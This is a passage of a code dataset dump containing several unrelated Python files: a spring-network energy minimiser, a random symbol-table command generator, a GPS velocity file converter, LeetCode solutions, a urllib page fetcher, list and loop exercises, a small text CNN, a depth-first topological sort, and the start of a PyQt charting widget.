3*CPM[i,1]:3*CPM[i,1]+3] = 1\n\n\tfor i in range(numberOfConnections-2):\n\t\tBCPM3D[i, 3*CPM[i,0]:3*CPM[i,0]+3, 3*CPM[i,0]:3*CPM[i,0]+3] = 1 \n\t\tBCPM3D[i, 3*CPM[i,1]:3*CPM[i,1]+3, 3*CPM[i,1]:3*CPM[i,1]+3] = 1 \n\t\tBCPM3D[i, 3*CPM[i,0]:3*CPM[i,0]+3, 3*CPM[i,1]:3*CPM[i,1]+3] = 1\n\t\tBCPM3D[i, 3*CPM[i,1]:3*CPM[i,1]+3, 3*CPM[i,0]:3*CPM[i,0]+3] = 1\n\t\t\n\t#----------------------------------------------------------------------------------------------------------------------- \n\t\t\t\t\t\t\t\t\t \n\n\n\t#--------------------------------ENCODE WHICH CORNERS ARE CONNECTED IN A CONNECTION-------------------------------------\n\t'''A row of ConnectedCornersMatrix(CCM) tells the Corner Number of the Polygon that share the Connection'''\n\tCCM = np.zeros((numberOfConnections,2), dtype = int) \n\tCCM[0:int(numberOfConnections/2)]=[3,1]\n\tCCM[int(numberOfConnections/2):numberOfConnections]=[2,0]\n\t#-----------------------------------------------------------------------------------------------------------------------\n\tCCM = np.delete(CCM, [5,11], 0)\n\n\t'''\n\t#------------------------------------ENCODE THE SHAPE INFO INTO ALL THE PARTICLES---------------------------------------\n\t#Define all the 'l' vectors (LVectors) originating from the center of the particles and define all the 'theta'(LAngl-\n\t#es) of each of the 'l' vectors\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\tLVectors = np.zeros((n**2, 4), dtype = float) \n\tLAngles = np.zeros((n**2, 4), dtype = float) \n\tfor Polygon in range(numberOfPolygons - 1): \n\t\tLVectors[Polygon] = [5.0, 6.0, 7.0, 5]\n\t\tLAngles[Polygon] = [np.pi/2, 2*np.pi/2, 3*np.pi/2, 4*np.pi/2] \n\t\t#LAngles[Polygon] = [np.pi/3, np.pi, 2*np.pi/3+np.pi, np.pi/3+2*np.pi/3+np.pi]\n\t#Fill the Shape Info in a np.array with shape (n**2, 4, 2) and randomize things a bit \n\tShapeInfo = np.zeros((numberOfPolygons - 1, 4, 2), dtype = float) \n\tfor Polygon in range(numberOfPolygons - 1):\n\t\tShapeInfo[Polygon, :, 0] = [L + 1.0*(0.50 - random.random()) for L in LVectors[Polygon]] \n\t\tShapeInfo[Polygon, :, 1] = [Theta + 1.0*(0.50 - random.random()) for Theta in LAngles[Polygon]] \n\t\t\n\t#-----------------------------------------------------------------------------------------------------------------------\n\t'''\n\n\n\n\n\tequilibratedEnergy = []; distance = []\n\n\tOrientationBody2 = np.concatenate((np.linspace(0, 1.04, 10).reshape(10,1),np.linspace(0, -1.04, 10).reshape(10,1)))\n\tOrientationBody2 = np.array([0])\n\tPositionVector = startingPositionVector \n\tFigNumber = 0\n\n\t#plt.figure(FigNumber); FigNumber += 1\n\t#visualize(PositionVector, n, ShapeInfo)\n\n\tAngleCount = 0\n\t\t \n\tfor PositionVector[5] in OrientationBody2:\n\t\t\n\t\tEnergyOfSystem = []; iterCount = []\n\t\tAngleCount += 1\n\t\tif(PositionVector[5] == 0.0):\n\t\t\tPositionVector = startingPositionVector\n\t\t\n\t\t#---------------------------------X1, Y1, Theta1, L1, Phi1, X2, Y2, Theta2, L2, Phi2------------------------------------\n\t\t''' The 10 required vectors for Vectorization'''\n\t\tX1 = np.zeros((numberOfConnections -2,)); Y1 = np.copy(X1); Theta1 = np.copy(X1); LenVec1 = np.copy(X1); Phi1 = np.copy(X1)\n\t\tX2 = np.zeros((numberOfConnections -2,)); Y2 = np.copy(X1); Theta2 = np.copy(X1); LenVec2 = np.copy(X1); Phi2 = np.copy(X1)\n\t\t\n\t\tfor i in range(numberOfConnections-2):\n\t\t\tX1[i] = PositionVector[3*CPM[i, 0], 0] \n\t\t\tY1[i] = PositionVector[3*CPM[i, 0] + 1, 0]\n\t\t\tTheta1[i] = PositionVector[3*CPM[i, 0] + 2, 0]\n\t\t\tLenVec1[i] = ShapeInfo[CPM[i, 0], CCM[i, 0],0]\n\t\t\tPhi1[i] = ShapeInfo[CPM[i, 0], CCM[i, 0],1]\n\t\t\t\n\t\t\tX2[i] = PositionVector[3*CPM[i, 1], 0]\n\t\t\tY2[i] = PositionVector[3*CPM[i, 1] + 1, 0]\n\t\t\tTheta2[i] = PositionVector[3*CPM[i, 1] + 2, 0]\n\t\t\tLenVec2[i] = ShapeInfo[CPM[i, 1], CCM[i, 1],0]\n\t\t\tPhi2[i] = ShapeInfo[CPM[i, 1], CCM[i, 1],1]\n\t\t#-----------------------------------------------------------------------------------------------------------------------\n\t\t\t\n\t\t \n\t\t#----------------------NON LINEAR CONJUGATE GRADIENT ALGORITHM WITH NEWTON RAPHSON AND FLETCHER REEVS-----------\n\t\t\n\t\tNetwork = UpdateNetwork(X1, Y1, Theta1, LenVec1, Phi1, X2, Y2, Theta2, LenVec2, Phi2, BCPM2D, BCPM3D)\n\t\tFirstDerivativeVector = Network.UpdateFirstDerivativeVector()\n\t\tSecondDerivativeMatrix = Network.UpdateSecondDerivativeMatrix()\n\t\tEnergyOfSystem.append(Network.EnergyStoredInSprings()); count = 0; iterCount.append(count)\n\t\t\n\t\tj = 0 ; j_max = 400 ; k = 0 \n\t\t \n\t\tr = -FirstDerivativeVector\n\t\t\n\t\td = r\n\t\t\n\t\tdel_new = dotProduct(transpose(r), r)\n\t\tdel_o = del_new\n\t\t\n\t\t\n\t\twhile (j < j_max):\n\t\t\t\n\t\t\tdel_d = dotProduct(transpose(d), d)\n\t\t\t\n\t\t\t\n\t\t\talpha = -(dotProduct(transpose(FirstDerivativeVector), d))/ \\\n\t\t\t(dotProduct(transpose(d),dotProduct(SecondDerivativeMatrix,d)))\n\t\t\t\n\t\t\t\n\t\t\tPositionVector = PositionVector + alpha*d\n\t\t\t\n\t\t\t\n\t\t\t#-----------------------------------------------------------------------------------------------------------\n\t\t\tfor i in range(numberOfConnections-2):\n\t\t\t\tX1[i] = PositionVector[3*CPM[i, 0], 0] \n\t\t\t\tY1[i] = PositionVector[3*CPM[i, 0] + 1, 0]\n\t\t\t\tTheta1[i] = PositionVector[3*CPM[i, 0] + 2, 0]\n\t\t\t\tLenVec1[i]= ShapeInfo[CPM[i, 0], CCM[i, 0],0]\n\t\t\t\tPhi1[i] = ShapeInfo[CPM[i, 0], CCM[i, 0],1]\n\t\t\t\t\n\t\t\t\tX2[i] = PositionVector[3*CPM[i, 1], 0]\n\t\t\t\tY2[i] = PositionVector[3*CPM[i, 1] + 1, 0]\n\t\t\t\tTheta2[i] = PositionVector[3*CPM[i, 1] + 2, 0]\n\t\t\t\tLenVec2[i]= ShapeInfo[CPM[i, 1], CCM[i, 1],0]\n\t\t\t\tPhi2[i] = ShapeInfo[CPM[i, 1], CCM[i, 1],1]\n\t\t\t#-----------------------------------------------------------------------------------------------------------\n\t\t\t\t\n\t\t\t\n\t\t\tNetwork = UpdateNetwork(X1, Y1, Theta1, LenVec1, Phi1, X2, Y2, Theta2, LenVec2, Phi2, BCPM2D, BCPM3D)\n\t\t\tFirstDerivativeVector = Network.UpdateFirstDerivativeVector()\n\t\t\tSecondDerivativeMatrix = Network.UpdateSecondDerivativeMatrix()\n\t\t\tEnergyOfSystem.append(Network.EnergyStoredInSprings()); count += 1; iterCount.append(count)\n\t\t\n\t\t\t\n\t\t\t\n\t\t\tr = -FirstDerivativeVector\n\t\t\t\n\t\t\tdel_old = del_new\n\t\t\tdel_new = dotProduct(transpose(r), r)\n\t\t\n\t\t\tbeta = del_new/del_old\n\t\t\td = r + beta*d\n\t\t\t\n\t\t\t#------------------LOOP RESTART------------------------\n\t\t\tk = k + 1\n\t\t\tif (k==27) or (dotProduct(transpose(r), d) <= 0):\n\t\t\t\td = r\n\t\t\t\tk = 0\n\t\t\t#------------------------------------------------------\n\t\t\t \n\t\t\t \n\t\t\tif (np.log10(EnergyOfSystem[-1]) < -20):\n\t\t\t\t#print('{0}/{1}'.format(AngleCount,len(OrientationBody2)))\n\t\t\t\tbreak\n\t\t\t\n\t\t\tj = j + 1 \n\t\t\t\n\t\t#--------------------------------------------------------------------------------------------------------------- \n\t\t'''\n\t\t#------------------------CONVERGENCE CURVE---------------------- \n\t\tplt.figure(FigNumber)\n\t\tplt.semilogy(iterCount, EnergyOfSystem)\n\t\t\n\t\tFigNumber += 1\n\t\t#--------------------------------------------------------------- \n\t\t'''\n\t\t\n\t\tequilibratedEnergy.append(np.log10(EnergyOfSystem[-1]))\n\n\t\t\t\n\t\t#------VISUALIZE THE FINAL POSITIONING OF THE PARTICLES--------- \n\t\t#plt.figure(FigNumber)\n\t\tvisualize(PositionVector, n, ShapeInfo)\n\n\t\tFigNumber += 1\n\t\t#--------------------------------------------------------------- \n\t\t\n\n\t\t\n\t\t\n\n\t\t\n\t\t\n\t\t#-----------------------------------------------------Distance--------------------------------------------------\n\t\tdistance.append(sqrt(((ShapeInfo[5,2,0]*np.cos(ShapeInfo[5,2,1]+PositionVector[17,0])+PositionVector[15,0])- \\\n\t\t\t\t(ShapeInfo[7,3,0]*np.cos(ShapeInfo[7,3,1]+PositionVector[23,0])+PositionVector[21,0]))**2+((ShapeInfo\\\n\t\t\t\t[5,2,0]*np.sin(ShapeInfo[5,2,1]+PositionVector[17,0])+ PositionVector[16,0])-(ShapeInfo[7,3,0]*np. \\\n\t\t\t\t\tsin(ShapeInfo[7,3,1]+PositionVector[23,0])+PositionVector[22,0]))**2))\n\t\t#--------------------------------------------------------------------------------------------------------------- \n\n\n\t\t\t\t\t \n\n\tdistance[0:50] = np.flipud(distance[0:50]) \n\n\tOrientationBody2[0:50] = np.flipud(OrientationBody2[0:50])\n\n\t''' \n\t#-----------------------------------------PLOT THE distance CURVE---------------------------------------------------\n\tplt.figure(FigNumber)\n\tplt.plot(OrientationBody2*180/np.pi, distance, color = 'r'); FigNumber += 1\n\tplt.ylim((2.5,5.5)); plt.xlim((-80,80))\n\tplt.ylabel(r'd',fontsize=30,labelpad=15, rotation = 0);plt.xlabel(r'$\\mathrm{\\theta^{\\circ}}$',fontsize=30, fontstyle = 'normal', labelpad = 3)\n\t#plt.savefig(os.getcwd()+'nitin', dpi = 1200)\n\t#------------------------------------------------------------------------------------------------------------------- \n\t''' \n\n\t\t\n\t'''\n\t#----------------------------------------------ZERO MODE ENERGY CURVE-----------------------------------------------\n\tplt.figure(FigNumber)\n\tplt.plot(OrientationBody2*180/np.pi, equilibratedEnergy, '.', color='blue') \n\tplt.ylim((-30,0)); FigNumber += 1\n\tplt.xlabel(r'OrientationBody2',fontsize=20,labelpad=0);plt.ylabel('$log_{10}(E_{Final})$',fontsize=20,rotation = 90)\n\t#-------------------------------------------------------------------------------------------------------------------\n\t''' \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n ","sub_path":"Notebooks/Helper_Files/intro_hpr1.py","file_name":"intro_hpr1.py","file_ext":"py","file_size_in_byte":19765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"448292766","text":"import sys\nfrom rstr import xeger as xe\nimport random\n\nclass Identifer:\n def __init__(self, num):\n self.name_reg = (r'([a-z]\\w)*')\n self.num = num\n\n def get_name(self, size, number):\n name_list = []\n for i in range(number):\n name_list.append(xe(self.name_reg)[:size])\n return name_list\n \n\nclass Generator(Identifer):\n def __init__(self, num):\n self.num = num\n self.name_reg = (r'([a-z]\\w)*')\n self.name_faultreg = (r'(\\w)*')\n self.insert_reg = (r'(^INSERT ([a-z]\\w*)[:10] (string|number|\\((?:|(?:number|string)(?:,(?:number|string))*)\\)->(?:number|string)) (true|false)$)')\n #self.assign_reg = (r'(^ASSIGN ([a-z]\\w*) (\\d+|[\\dA-Za-z\\s]*|[a-z]\\w*|[a-z]\\w*\\((?:|(?:\\d+|[\\dA-Za-z\\s]*|[a-z]\\w*)(?:,(?:\\d+|[\\dA-Za-z\\s]*|[a-z]\\w*))*)\\))$)')\n self.look_up = (r'^LOOKUP ([a-z]\\w)*')\n self.name_list = Identifer.get_name(self,6,20)\n \n def get_insert(self):\n lines = []\n name = self.name_list\n \n\n for i in range(self.num):\n insert = xe(self.insert_reg)\n tmp = insert.split(\" \")\n tmp[1] = random.choice(name)\n lines.append(\" \".join(tmp))\n return lines\n\n def get_lookup(self):\n lines = []\n name = self.name_list\n\n for i in range(self.num):\n lookup = xe(self.look_up)\n tmp = lookup.split(\" \")\n tmp[1] = random.choice(name)\n lines.append(\" \".join(tmp))\n return lines\n def get_end(self):\n return [\"END\" for i in range(3)]\n\n def get_begin(self):\n return [\"BEGIN\" for i in range(self.num)]\n \n def get_print(self):\n return [\"PRINT\" for i in range(self.num)]\n\n \n\n\n","sub_path":"nhq/object/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"260434375","text":"import gps_input_functions as gpsin\n\n[myVelfield] = gpsin.read_pbo_vel_file(\"../../Vel_Data/NAM08_pbovelfile_feb2018.vel\")\n# [myVelfield] = gpsin.blacklist(myVelfield, \"../../Vel_Data/blacklist_stations.txt\")\n# [myVelfield] = gpsin.remove_duplicates(myVelfield)\n# [myVelfield] = gpsin.clean_velfield(myVelfield, 2, .95, [-125, -121, 37, 42])\n\ndef output_unr(velfield, outdir):\n\toutfile=open(outdir+\"pbo_velo.txt\",'w');\n\tfor i in range(len(myVelfield.n)):\n\t\toutfile.write(\"%f %f %f %f %f %f 0.0\\n\" % (myVelfield.elon[i], myVelfield.nlat[i], myVelfield.e[i], myVelfield.n[i], myVelfield.se[i], myVelfield.sn[i]) );\n\toutfile.close();\n\treturn;\n\noutput_unr(myVelfield, \"../../Vel_Data/\")","sub_path":"Create_Inputs/PBO/pbo_outputs.py","file_name":"pbo_outputs.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"603115092","text":"# https://leetcode.com/problems/replace-words/description/\n\"\"\"\nIn English, we have a concept called root, which can be followed by some other words to form another longer word - let's call this word successor. For example, the root an, followed by other, which can form another word another.\n\nNow, given a dictionary consisting of many roots and a sentence. You need to replace all the successor in the sentence with the root forming it. If a successor has many roots can form it, replace it with the root with the shortest length.\n\nYou need to output the sentence after the replacement.\n\nExample 1:\nInput: dict = [\"cat\", \"bat\", \"rat\"]\nsentence = \"the cattle was rattled by the battery\"\nOutput: \"the cat was rat by the bat\"\nNote:\nThe input will only have lower-case letters.\n1 <= dict words number <= 1000\n1 <= sentence words number <= 1000\n1 <= root length <= 100\n1 <= sentence words length <= 1000\n\"\"\"\nimport collections\nfrom functools import reduce\nclass Solution(object):\n def replaceWords(self, roots, sentence):\n Trie = lambda: collections.defaultdict(Trie)\n trie = Trie()\n END = True\n\n for root in roots:\n reduce(dict.__getitem__, root, trie)[END] = root\n\n def replace(word):\n cur = trie\n for letter in word:\n if letter not in cur or END in cur: break\n cur = cur[letter]\n return cur.get(END, word)\n\n return \" \".join(map(replace, sentence.split()))\n\n\nclass Solution2:\n def replaceWords(self, dict, sentence):\n\n from collections import defaultdict\n\n def init_lookup(dict):\n lookup = defaultdict(list)\n for word in dict:\n lookup[word[0]].append(word)\n return lookup\n\n lookup = init_lookup(dict)\n\n new_sentence = []\n words = sentence.split()\n for word in words:\n root = word\n for dict_word in lookup[word[0]]:\n if word.startswith(dict_word) and len(dict_word) < len(root):\n root = dict_word\n new_sentence.append(root)\n return \" \".join(new_sentence)\n\n\nclass Solution3:\n def replaceWords(self, dict, sentence):\n from collections import defaultdict\n\n root_dict = sorted(dict)\n roots = defaultdict(list)\n for d in root_dict:\n roots[d[0]].append(d)\n\n words = sentence.split()\n for i in range(len(words)):\n r = words[i]\n if words[i][0] in roots:\n for rr in roots[words[i][0]]:\n if words[i].startswith(rr) and len(rr) < len(r):\n r = rr\n words[i] = r\n return \" \".join(words)\n","sub_path":"code/648#Replace Words.py","file_name":"648#Replace Words.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"17329990","text":"import urllib.request\n\nimport logging\n\n\nFORMAT = \"%(asctime)-15s %(message)s\"\nlogging.basicConfig(format=FORMAT, level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\nclass DiskfetcherBaseV1(object):\n def __init__(self, url, **kwargs):\n self.request_type_and_its_equivalent_function_name = {\n \"urllib\" : self.get_page_content_using_urllib,\n \"POST\" : self.get_page_content_using_post,\n \"GET\" : self.get_page_content_using_get\n }\n self.version = \"v1.0\"\n self.url= url\n self.request_type = kwargs.get(\"request_type\", \"urllib\")\n if self.request_type == \"POST\":\n self.payload = kwargs.get(\"payload\", None)\n self.request_header = kwargs.get(\"request_header\", {})\n self.page_content_hash = None\n\n def get_page_content_hash(self):\n current_request_type_function = self.request_type_and_its_equivalent_function_name.get(self.request_type)\n if current_request_type_function:\n current_request_type_function()\n\n #if self.request_type == \"urllib\":\n # self.page_content_hash = self.get_page_content_using_urllib()\n #elif self.request_type == \"GET\":\n # self.page_content_hash = self.get_page_content_using_get()\n #elif self.request_type == \"POST\":\n # self.page_content_hash = self.get_page_content_using_post()\n #else:\n # self.page_content_hash = None\n\n def get_page_content_using_urllib(self):\n response_page_hash = {}\n response_hash = \"\"\n response_code = 0\n try:\n req = urllib.request.Request(url, None, self.request_header)\n with urllib.request.urlopen(req) as response:\n response_hash = response.read()\n response_code = response.getcode()\n except Exception as e:\n logging.info(\"{0}{1}{2}{3}{4}\".format(dir(e), e.reason, e.filename, e.with_traceback, e.strerror))\n response_page_hash.update({'response_source': response_hash})\n response_page_hash.update({'response_code': response_code})\n logging.info(response_page_hash)\n return response_page_hash\n #pass\n\n def get_page_content_using_get(self):\n pass\n\n def get_page_content_using_post(self):\n pass\n\n\nif __name__ == \"__main__\":\n url = \"https://www.google.dd\"\n #args_hash = {'request_type':'urllib'}\n args_hash = {}\n args_hash.update({'request_header' : {'User-Agent' : 'Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405'}})\n diskfetcher = DiskfetcherBaseV1(url,**args_hash)\n diskfetcher.get_page_content_hash()","sub_path":"diskfetcher/diskfetcher_base_v1.py","file_name":"diskfetcher_base_v1.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"650643804","text":"'''\r\nCreated on Mar 28, 2017\r\n\r\n@author: Ben Rose\r\n'''\r\nimport random\r\n\r\ndef leppard(input_string):\r\n output_string = ''\r\n for symbol in input_string:\r\n if symbol == 'o':\r\n output_string = output_string + 'ooo'\r\n else:\r\n output_string = output_string + symbol\r\n return output_string\r\n\r\nvowels = ['a', 'e', 'i', 'o', 'u']\r\n\r\ndef spamify(word):\r\n for i in range(len(word)):\r\n if word[i] not in vowels:\r\n return word[0:i] + 'spam' + word[i+1:]\r\n return word\r\n\r\n# for in \r\n# Do something!\r\n\r\n# while :\r\n# Do Stuff!\r\n\r\n#i = 0\r\n#while i < 100:\r\n# print(i)\r\n# i += 1\r\n\r\n#for i in range(100):\r\n# print(i)\r\n\r\n'''\r\nsum = 0\r\ni = 0\r\nwhile i < 10:\r\n sum = sum + i\r\n i += 1\r\nprint(sum)\r\n'''\r\n\r\ndef mapSqr(mylist):\r\n finallist = []\r\n for number in mylist:\r\n finallist.append(number * number)\r\n return finallist\r\n\r\n#print(mapSqr([25,1,4]))\r\n\r\ndef mapSqr2(mylist):\r\n return [number * number for number in mylist]\r\n\r\n#print(mapSqr2([25,1,4]))\r\n\r\ndef average(mylist):\r\n mysum = 0\r\n for number in mylist:\r\n mysum = mysum + number\r\n #same as mysum += number\r\n return mysum/len(mylist)\r\n\r\n#print(average([100,85,89]))\r\n\r\ndef find_max(mylist):\r\n '''Returns the maximum value in mylist. If the list is empy, returns None.'''\r\n if mylist == []:\r\n return None\r\n else:\r\n mymax = mylist[0]\r\n for number in mylist:\r\n if number > mymax:\r\n mymax = number\r\n return mymax\r\n\r\n#print(find_max([1,2,56,4,33,2,9,3434,2,-3]))\r\n\r\ndef find_min(mylist):\r\n '''Returns the minimum value in mylist. If the list is empty, returns None.'''\r\n if mylist == []:\r\n return None\r\n else:\r\n mymin = mylist[0]\r\n for number in mylist:\r\n if number < mymin:\r\n mymin = number\r\n return mymin\r\n \r\n#print(find_min([1,2,56,4,33,2,9,3434,2,-3]))\r\n\r\ndef findMinMax(mylist):\r\n if mylist == []:\r\n return None\r\n else:\r\n mymin = mymax = mylist[0]\r\n for number in mylist:\r\n if number > mymax:\r\n mymax = number\r\n elif number < mymin:\r\n mymin = number\r\n return (mymin,mymax)\r\n \r\n#print(findMinMax([1,2,56,4,33,2,9,3434,2,-3]))\r\n\r\ndef shallowCopy(mylist):\r\n# finallist = []\r\n# for number in mylist:\r\n# finallist.append(number)\r\n# return finallist\r\n return [number for number in mylist]\r\n\r\ndef deepCopy(mylist):\r\n finallist = []\r\n for index in mylist:\r\n if type(index) is list:\r\n finallist.append(deepCopy(index))\r\n else:\r\n finallist.append(index)\r\n return finallist\r\n\r\ndef sumMatrix(matrix):\r\n mysum = 0\r\n for row in range(len(matrix)):\r\n for col in range(len(matrix[row])):\r\n mysum += matrix[row][col]\r\n return mysum\r\n\r\ndef sumMatrix2(matrix):\r\n mysum = 0\r\n for row in matrix:\r\n for index in row:\r\n mysum += index\r\n return mysum\r\n\r\ndef printMatrix(matrix):\r\n for row in range(len(matrix)):\r\n print(' ', end='')\r\n for col in range(len(matrix[row])):\r\n print(matrix[row][col], end=' ')\r\n if col < 2:\r\n print('| ',end = '')\r\n print()\r\n if row < 2:\r\n print('-'*11)\r\n\r\n#Alias Example:\r\n#S = [3,4,5]\r\n#T = S\r\n#S[1] = 2\r\n#print(S)\r\n#print(T)\r\n\r\n#Shallow Copy Example:\r\n# S = [1,[3,5],12]\r\n# T = shallowCopy(S)\r\n# print(S)\r\n# print(T)\r\n# T[1][0] = 5\r\n# print(S)\r\n# print(T)\r\n\r\n# Deep Copy Example:\r\n# S = [1,[3,5],12]\r\n# T = deepCopy(S)\r\n# print(S)\r\n# print(T)\r\n# T[1][0] = 5\r\n# print(S)\r\n# print(T)\r\n\r\n# Checking if 2 variables are the same place in memory (Aliases)\r\n# id function: The address of the variable in memory\r\n# S = [3,4,5]\r\n# T = S\r\n# print(S==T)\r\n# print(S is T)\r\n# print(id(S))\r\n# print(id(T))\r\n\r\n# Matrixes practice\r\n# _ is used when you dont need the value of a variable, you just want to do the loop.\r\nmatrix = [[random.randint(1,9) for _ in range(3)] for _ in range(3)]\r\nprint(matrix)\r\nprint(sumMatrix(matrix))\r\nprint(sumMatrix2(matrix))\r\nprintMatrix(matrix)\r\n\r\n","sub_path":"Loops.py","file_name":"Loops.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"241099529","text":"# import torch\n# import torch.nn as nn\n# import torch.nn.functional as F\n\n\n# a=torch.Tensor([[[1,2,3,4],[5,6,7,8]], # entity\n# [[9,10,11,12],[13,14,15,16]], # entity\n# [[17,18,19,20],[21,22,23,24]] # entity\n# ])\n# print(a)\n# a=a.permute(0,2,1)\n# print(a)\n# # a=F.pad(input=a,pad=(2,1),mode='circular')\n# # print(a)\n\n# conv1=nn.Conv1d(in_channels=4, out_channels=4, kernel_size=2, padding_mode='circular')\n# out=conv1(a)\n# print(out)\n# print(out.size())\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# max_sent_len=35, batch_size=50, embedding_size=300\ninput = torch.randn(50, 35, 500) # 50 entity per batch, 35 words in 1 entity, 1 word with 300-dim embedding\ninput = input.permute(0, 2, 1)\n\nwindows_size = [2,3,4]\n\nall_features = []\nfor window_size in windows_size:\n features = F.pad(input, (0, window_size-1), mode='circular')\n\n conv = nn.Conv1d(in_channels=500, out_channels=500, kernel_size=window_size)\n act = nn.ReLU()\n maxpool = nn.MaxPool1d(kernel_size=35-window_size+1)\n\n features = conv(features)\n features = act(features)\n features = maxpool(features)\n\n all_features.append(features)\n\nall_features = torch.cat(all_features, dim=1)\nprint(all_features)\nprint(all_features.size())\n\ndropout = nn.Dropout(p=0.2)\nfc = nn.Linear(in_features=500*len(windows_size), out_features=500)\n\nall_features = all_features.flatten(start_dim=1)\nall_features = dropout(all_features)\ne_cnn_vec = fc(all_features)\nprint(e_cnn_vec)\nprint(e_cnn_vec.size())\n\n# input = F.pad(input, (0, window_size-1), mode='circular')\n# print(input)\n\n# # batch_size x max_sent_len x embedding_size -> batch_size x embedding_size x max_sent_len\n# print(\"input:\", input.size())\n\n# output = conv1(input)\n# print(output)\n# act = nn.ReLU()\n# output = act(output)\n# print(output)\n# print(\"output:\", output.size())\n# # 最大池化\n# pool1d = \n# pool1d_value = pool1d(output)\n# print(\"最大池化输出:\", pool1d_value.size())\n# # 全连接\n# fc = nn.Linear(in_features=500, out_features=500)\n# fc_inp = pool1d_value.view(-1, pool1d_value.size(1))\n# print(\"全连接输入:\", fc_inp.size())\n# fc_outp = fc(fc_inp)\n# print(\"全连接输出:\", fc_outp.size())\n# # softmax\n# m = nn.Softmax()\n# out = m(fc_outp)\n# print(\"输出结果值:\", out)","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"595755112","text":"'''\n\tDirected Acyclic Graph, but still using weight 1 for all for weighted graph practice.\n\t1 - indexed Adjacency list\n'''\nparent=[]\ncolor=[]\ndist=[]\nfinish=[]\norder = []\ntime=0\ndef print_adj_list(adj_list, n):\n\tfor i in range(1, n+1):\n\t\tprint(i,':',end='')\n\t\tfor val in adj_list[i]:\n\t\t\tprint(val,'->', end='')\n\t\tprint()\n\ndef dfs_visit(adj_list,u):\n\tglobal parent, color, dist, finish, time, order\n\tprint(u,end = ' ')\n\ttime+=1\n\tdist[u]=time\n\tcolor[u]=1\n\tfor v,weight in adj_list[u]:\n\t\tif color[v]==0:\n\t\t\tparent[v]=u\n\t\t\tdfs_visit(adj_list,v)\n\tcolor[u]=2\n\ttime+=1\n\tfinish[u]=time\n\torder.append(u)\n\tprint(u,end = ' finished ')\n\ndef dfs(adj_list, n):\n\tglobal parent, color, dist, finish, time, order\n\tparent = [0]*(n+1)\n\tcolor = [0]*(n+1)\n\tdist = [float(\"inf\")]*(n+1)\n\tfinish = [0]*(n+1)\n\ttime = 0\n\tfor i in range(1,n+1):\n\t\tif color[i]==0:\n\t\t\tdfs_visit(adj_list,i)\n\tprint()\n\n\n\nn = int(input().strip())\nno_edges = int(input().strip())\n\n#1-indexed\nadj_list = [[] for i in range(n+1)]\ni=0\nwhile i len(self._keys_ws):\n raise NotImplementedError\n logger.error('too much keys')\n\n else:\n for i, key in enumerate(keys):\n w = self._keys_ws[i]\n w.update_data(**key)\n\n\n# =============================================================================\nclass ChartLink(QtCore.QObject):\n sig_regions_bounds = QtCore.pyqtSignal(tuple)\n# sig_xaxis_bounds = QtCore.pyqtSignal(tuple)\n usr_regions_bounds = QtCore.pyqtSignal(tuple)\n\n# :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n def __init__(self, parent=None):\n QtCore.QObject.__init__(self, parent=parent)\n\n self.charts = _pyr.v()\n\n# :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n @QtCore.pyqtSlot(tuple)\n def set_regions_bounds(self, bounds):\n# logger.debug('[Link] receive bounds {}'.format(bounds))\n self.sig_regions_bounds.emit(bounds)\n\n## :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n# @QtCore.pyqtSlot(tuple)\n# def set_xrange(self, xrange):\n# logger.debug('Link: receive xrange: {}'.format(xrange))\n# self.sig_xaxis_bounds.emit(xrange)\n\n# =============================================================================\nclass Chart(QtWidgets.QFrame):\n regionChanged = QtCore.pyqtSignal(tuple)\n xrangeChanged = QtCore.pyqtSignal(tuple)\n\n# :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n def __init__(self, data,\n sampling_rate, name='?',\n settings=None,\n parent=None,\n link=None):\n\n QtWidgets.QFrame.__init__(self, parent=parent)\n\n self.name=name\n timeseries = data\n\n self.FLAG_REGION_CHANGING = False\n\n\n # ordering names ......................................................\n names_ordering = _pyr.pvector(sorted(timeseries.keys(), key=str.lower))\n\n # computing time vectors ..............................................\n dt = 1.0 / sampling_rate\n self.sampling_rate = sampling_rate\n self.dt = dt\n\n sizes_by_names = timeseries.transform(\n [_pyr.ny],\n lambda array: array.shape[0],\n )\n\n times_by_names = sizes_by_names.transform(\n [_pyr.ny],\n lambda size: np.linspace(0.0, (size - 1) * dt, size),\n )\n logger.debug('sorting keys: {}'.format(names_ordering))\n\n # set colors ..........................................................\n cls = get_colors(len(timeseries.keys()))\n\n colors_by_names = _pyr.m().evolver()\n for name, col in zip(names_ordering, cls):\n colors_by_names.set(name, col)\n\n colors_by_names = colors_by_names.persistent()\n logger.debug('attribs a color: {}'.format(colors_by_names))\n\n # set Enabled state ...................................................\n enabled_states_by_names = timeseries.transform([_pyr.ny], False)\n logger.debug('attribs enabled state: {}'.format(enabled_states_by_names))\n\n self.enabled_states_by_names = enabled_states_by_names\n self.times_by_names = times_by_names\n self.colors_by_names = colors_by_names\n self.names_ordering = names_ordering\n self.timeseries = timeseries\n\n\n # customizing pyqtgraph ...............................................\n# pg.setConfigOption('background', 'w')\n pg.setConfigOption('background', (0, 100, 150))\n# 